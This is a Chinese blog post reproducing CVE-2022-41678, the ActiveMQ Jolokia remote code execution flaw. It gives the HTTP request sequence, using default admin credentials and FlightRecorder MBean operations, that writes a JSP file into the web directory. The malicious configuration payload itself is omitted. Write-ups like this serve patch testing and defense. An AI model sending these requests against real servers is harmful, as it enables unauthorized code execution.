【漏洞复现】ActiveMQ Jolokia 远程代码执行漏洞 CVE-2022-41678

最新推荐文章于 2024-09-15 17:22:56 发布
最新推荐文章于 2024-09-15 17:22:56 发布
阅读量716 收藏 8
点赞数 11
文章标签: activemq 知识图谱 人工智能
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18193739/article/details/134742430
版权

影响范围

Apache ActiveMQ before 5.16.6
Apache ActiveMQ 5.17.0 before 5.17.4
Apache ActiveMQ 5.18.0 unaffected
Apache ActiveMQ 6.0.0 unaffected

漏洞复现版本下载

https://activemq.apache.org/activemq-5017000-release

漏洞复现

新建记录
POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 136

{
    "type": "EXEC",
    "mbean": "jdk.management.jfr:type=FlightRecorder",
    "operation": "newRecording",
    "arguments": []
}

记住这个 value参数中的值,后面的poc要用到,例如现在是4
在这里插入图片描述

写入payload

payload太长了,放在最后了
在这里插入图片描述

POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 136

{
    "type": "EXEC",
    "mbean": "jdk.management.jfr:type=FlightRecorder",
    "operation": "setConfiguration",
    "arguments": [4,""]
}

在这里插入图片描述

导出录制到web目录

POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 141

{
    "type": "EXEC",
    "mbean": "jdk.management.jfr:type=FlightRecorder",
    "operation": "startRecording",
    "arguments": [4]
}

在这里插入图片描述

POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 138

{
    "type": "EXEC",
    "mbean": "jdk.management.jfr:type=FlightRecorder",
    "operation": "stopRecording",
    "arguments": [4]
}

在这里插入图片描述

导出到web目录
POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 159

{
    "type": "EXEC",
    "mbean": "jdk.management.jfr:type=FlightRecorder",
    "operation": "copyTo",
    "arguments": [4,"../../webapps/test.jsp"]
}

在这里插入图片描述

test.jsp写入成功

在这里插入图片描述
在这里插入图片描述

漏洞来源

  • https://l3yx.github.io/2023/11/29/Apache-ActiveMQ-Jolokia-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2022-41678-%E5%88%86%E6%9E%90/
  • https://github.com/wy876/POC/

payload

本地搭建源码,环境配置不正确,无法调试代码,payload是搜索GitHub关键字找到的

  • https://github.com/gradle/gradle-profiler/blob/2eb14e031fbd48203fb05b28183decd1ee2304de/src/main/resources/org/gradle/profiler/jfr/openjdk.jfc#L4
yr678
关注
activemq 远程代码执行CVE-2016-3088)
qq_32445755的博客
03-31 556
简介 ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了 jetty。Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程攻击者用恶意代码替代 Web 应用,在受影响系统上执行远程代码,请拿到 flag,默认在/tmp/目录中。提示:该漏洞一句话木马无法执行,请利用命令执行
activemq 命令执行漏洞cve-2015-5254)
QuanPangShu的博客
06-14 291
activemq 命令执行漏洞cve-2015-5254)
CVE-2022-41678复现学习
shierbai的博客
05-18 414
访问即需要输入密码,进去是在index.html页面,这里切换到admin查看版本5.17.3ActiveMQ中,经过身份验证的攻击者可利用该漏洞,通过Jolokia服务发送特制的HTTP请求写入恶意文件,进而实现远程代码执行
ActiveMQ Jolokia 代码执行漏洞(CVE-2022-41678)复现
huangyongkang666的博客
12-05 2315
ActiveMQ后台存在Jolokia 代码执行漏洞,在ActiveMQ中,经过身份验证的远程攻击者下可通过/api/jolokia/接口操作MBean,成功利用此漏洞可导致远程代码执行
Apache ActiveMQ Jolokia 远程代码执行漏洞复现(CVE-2022-41678)
qq_53733257的博客
12-07 2021
不太会调试,所以复现得很困难,踩了不少坑,记录此篇,比较详细。Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2022-41678)分析 | l3yx's blog。
Apache ActiveMQ RCE漏洞复现CVE-2023-46604)
0xSec
10-26 8244
ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行
腾讯蓝军安全通告|XStream远程代码执行漏洞(CVE-2021-29505)
Tencent_SRC的博客
05-17 5720
前言上周五XStream官方发布安全更新,由于官方把需要公告的CVE-2021-29505(任意代码执行漏洞)链接贴错成了CVE-2020-26258(SSRF漏洞)链接,导致很多人没有重...
CVE-2020-11998 —— Apache ActiveMQ 远程代码执行漏洞
战神/calmness的博客
12-10 1253
目录 Apache ActiveMQ 组件介绍 描述 影响版本 过程 修复建议 CVE-2020-11998 | Apache ActiveMQ 远程代码执行漏洞 Apache ActiveMQ 组件介绍 Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 描述 9月10日Apache软件基金会发布安全公告,修复了Apache Active.
Spring + ActiveMQ 整合实现点对点(point to point)消息发送案例
z123456789XDW的博客
09-04 584
本节演示点对点模式的消息发送的 Spring + ActiveMQ 代码。Spring + ActiveMQ 整合1、依懒包spring:4.2.5.RELEASE,activemq-all:5.15.0<dependency> <groupId>javax.servlet</groupId> <artifactId>java...
【AI大模型】Kimi API大模型接口实现
qq_25888559的博客
09-15 598
Kimi智能助手在效率(免费榜)排名从2024年1月14日的第436名提升至3月19日的第11名。而尚未上线的GPT-4.5 Turbo上下文窗口指定为25.6万个token,能同时处理约20万个单词,Kimi升级后,长文本能力为其10倍。在2023年10月初次亮相时,该模型的处理能力还仅有约20万汉字。2024年3月18日,月之暗面宣布Kimi智能助手启动200万字无损上下文内测。
BART&BERT
最新发布
GDHBFTGGG的博客
09-15 708
model_name = "facebook/bart-large-cnn" # 选择一个BART模型,这里使用CNN新闻摘要任务的预训练模型。尽管BART和BERT在设计和应用上有所不同,但它们都利用了Transformer的强大能力来处理自然语言,并在NLP领域取得了显著的成果。model_name = "bert-base-uncased" # 选择一个BERT模型。model.eval() # 将模型设置为评估模式。# 加载预训练的BERT模型和分词器。# 加载预训练的BART模型和分词器。
生成式人工智能在新加坡的发展现状和地位
wukangjupingbb的博客
09-11 998
依据国际隐私专业人员协会(IAPP)的相关报告,2020年,上述两机构更新了该模型框架,发布了第二版,并推出了《组织实施和自我评估指南》,帮助组织评估其人工智能治理实践与型框架的匹配程度,还发布了《案例汇编》,展示了组织如何实施负责任的人工智能治理实践。2019年,金融管理局宣布与金融行业合作创建Veritas框架,为金融机构提供可验证的方法,将FEAT原则纳入其人工智能和数据分析驱动的解决方案中。新加坡在人工智能治理方面采取了部门性的方法,即通过各个行业的监管机构来管理人工智能的使用。
从AI到大数据,数字技术服务平台全栈赋能企业升级
smjt2024的博客
09-11 581
海量的数据中蕴含着丰富的信息和价值,数字技术服务平台能够收集、整理和分析这些数据,为企业提供精准的市场洞察和决策支持。企业可以通过参加树莓集团举办的培训课程和研讨会,了解最新的数字技术趋势和应用案例,提升自身的数字技术水平。从技术咨询、解决方案设计到系统实施和运维,数字技术服务平台为企业提供一站式的服务,让企业无需担心技术难题,专注于自身的核心业务。树莓集团的数字技术服务平台,以其先进的技术、专业的服务和丰富的经验,为企业提供了全栈赋能。在数字时代,让我们共同利用数字技术服务平台,开启企业升级的新篇章。
Djourney新手入门基础,AI摄影+AI设计+AI绘画-AIGC作图
DAMOXINGHAITAI的博客
09-14 816
(全套教程文末领取哈)从大模型系统设计入手,讲解大模型的主要方法;在通过大模型提示词工程从Prompts角度入手更好发挥模型的作用;大模型平台应用开发借助阿里云PAI平台构建电商领域虚拟试衣系统;大模型知识库应用开发以LangChain框架为例,构建物流行业咨询智能问答系统;大模型微调开发借助以大健康、新零售、新媒体领域构建适合当前领域大模型;以SD多模态大模型为主,搭建了文生图小程序案例;以大模型平台应用与开发为主,通过星火大模型,文心大模型等成熟大模型构建大模型行业应用。
常见本地大模型个人知识库工具部署、微调及对比选型
09-14 795
由于作者的眼界、精力和能力也有限,并且确实也不是专业的AI研究员,仅仅是一位兴趣使然的爱好者,这里列出的几款也单纯只是作者平常关注到的,所以可能也不全,请各位见谅!文章从起笔写到这里已经过了三天了,这三天也基本把上文提到的大模型侧工具全部体验了一遍,下面说一下主要结论吧。从功能丰富度和性能优化的角度综合评估,LM Studio明显更胜一筹。从工具本身使用及模型部署效率来看,Ollama的上手速度会更快,使用会更便捷,效率也会更高。从企业级稳定性和高可用。
有用的批量合并视频重命名以及有用的提取音频。遍历指定文件夹下所有视频文件,先合并归一化再生成包含包含说话人的srt格式的文件
东方
09-11 451
定义filename为"E:\四1班—吴希敏"遍历这个文件夹"E:\四1班—吴希敏"且包含多个层级目录的视频文件,重命名的时候把filename以及子文件夹目录的名字以及视频的名字一起命名,并统一把视频全部移动到filename下面。
python-游戏自动化(二)(OpenCV图像运用基础)
qiqi776532的博客
09-11 1267
图像二值化可以简单理解成,就是把图像转换成黑白两种颜色(一般用于提取图像特征),二值化图像:只有两种颜色,黑和白,255白色,0黑色。结合前面学习的彩色图像和灰度图像,一起来做个对比。彩色图像:三个通道0-255,0-255,0-255,所以可以有2^24位空间灰度图像:一个通道0-255,所以有256种颜色二值图像:只有两种颜色,黑和白,255白色,0黑色图像匹配,就是从一个图像中找出想要的小图像,打个比方:就好比拿着老师的头像寸照,然后去师的大学毕业照里面一个个的头像对照然后将老师找出来。
预警提醒并生成日志,便于后期追溯的智慧地产开源了
weixin_63598920的博客
09-12 962
智慧地产视觉监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。AI是新形势下数字经济的重要基础设施,具备同各行各业结合的能力,越来越多的行业和领域都在进行不同层次的智能化升级。新人工智能时代将是泛智能时代,覆盖的范围也远远不止传统理解中的互联网和科技行业,将给全社会带来生产力和连接度的飞跃。用户只需在界面上进行简单的操作,就可以实现全视频的接入及布控。
activemq Eclipse Jetty 安全漏洞(CVE-2022-2048)
06-03
关于activemq和Eclipse Jetty的安全漏洞CVE-2022-2048,这是一个已经公开的安全漏洞,存在于Activemq和Eclipse Jetty的HTTP2协议实现中。攻击者可以利用此漏洞在目标服务器上执行任意代码或造成拒绝服务攻击。 如果您正在使用Activemq或Eclipse Jetty,请及时更新软件版本以修复此漏洞。同时,建议您加强服务器安全设置,限制对服务器的访问和提高系统日志监控能力,以保障系统安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yr678

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值